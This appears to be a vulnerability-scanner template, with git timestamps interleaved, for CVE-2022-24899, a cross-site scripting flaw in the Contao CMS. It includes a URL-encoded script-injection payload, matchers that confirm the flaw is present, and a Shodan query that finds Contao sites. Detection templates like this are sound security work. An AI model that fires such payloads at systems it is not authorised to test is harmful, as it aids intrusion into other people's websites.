2022-06-18 18:50:43 +00:00
id : CVE-2022-24899
info :
name : Contao 4.13.2 - Cross-Site Scripting (XSS)
author : ritikchaddha
2022-06-22 06:52:51 +00:00
severity : medium
2022-06-18 18:50:43 +00:00
description : |
Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
reference :
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://nvd.nist.gov/vuln/detail/CVE-2022-24899
2022-06-22 06:52:51 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-24899
cwe-id : CWE-79
2022-06-18 18:50:43 +00:00
metadata :
shodan-query : title:"Contao"
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,contao,xss,huntr
2022-06-18 18:50:43 +00:00
requests :
- method : GET
path :
2022-06-22 06:34:17 +00:00
- "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-06-18 18:50:43 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-06-22 06:34:17 +00:00
- '"></script><script>alert(document.domain)</script>'
2022-06-22 06:31:46 +00:00
- '"Not authenticated"'
condition : and
2022-06-18 18:50:43 +00:00
- type : word
part : header
words :
2022-06-22 06:31:46 +00:00
- text/html